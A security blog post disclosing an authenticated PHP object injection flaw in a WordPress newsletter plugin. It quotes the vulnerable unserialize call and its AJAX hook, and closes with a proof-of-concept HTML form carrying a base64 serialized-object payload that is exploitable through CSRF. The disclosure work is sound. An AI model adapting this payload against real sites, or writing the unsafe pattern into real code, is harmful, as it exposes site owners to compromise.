12 Mar

Brand New WordPress Plugin by “Automattic” Includes Authenticated PHP Object Injection Vulnerability

As we have mentioned repeatedly in the past, while brand new WordPress plugins are supposed to go through a security review before being allowed in the Plugin Directory, that either isn’t happening or it isn’t very good, as we keep finding brand new plugins that contain vulnerabilities that the possibility of is flagged by our Plugin Security Checker, an automated tool for checking for the possibilities of some security issues in WordPress plugins. We have offered the team the running the Plugin Directory free access to the more advanced mode of that tool to assist them in avoiding that happening (or help in creating similar functionality in their own workflow), but we have had no interest from them. They unfortunately seem more interested in covering up the problems they are having (and in some cases causing) instead of working with others like us to get them fixed.

Our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities includes many of the same checks as the Plugin Security Checker, so in the case of the plugin Newsletter Subscription Plugin for easyping.me they both flag the possibility of a PHP object injection vulnerability, which is the type of vulnerability that hackers have been known to exploit.

When we went to look into this plugin we noticed that it is listed as being by “Automattic”, which is the name of the company closely associated with WordPress. It seemed unlikely they would be behind a plugin with such an easy to spot vulnerability. It appears the developer isn’t actually associated with Automattic. Maybe they copied the main file for their plugin from an Automattic plugin, like Akismet and forgot to change the author field.

The line of code in the plugin flagged by our tools was this:

$group_select = unserialize( base64_decode( $_POST['epme-group-select'] ) );

That will unserialize user input from the POST input “epme-group-select”, which would permit PHP object injection to occur, and would be a vulnerability depending on how it can be accessed.

That code is in the function save_channel_processed():

public static function save_channel_processed() {
	try {
		$channel = addslashes( $_POST['channel'] );
		$group_select = unserialize( base64_decode( $_POST['epme-group-select'] ) );

The code that runs before that doesn’t restrict access to the potentially vulnerable code in anyway. That function is accessible to anyone logged in to WordPress as it runs through WordPress’ AJAX functionality:

add_action( 'wp_ajax_epme_channel_processed', array( 'EPME_Admin_Ajax', 'save_channel_processed' ), 50 );

So this a vulnerability and it could either be exploited by lower level users or through cross-site request forgery (CSRF).

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” be shown, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=epme_channel_processed " method="POST">
<input type="hidden" name="epme-group-select" value="TzoyMDoicGhwX29iamVjdF9pbmplY3Rpb24iOjA6e30=" />
<input type="submit" value="Submit" />

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.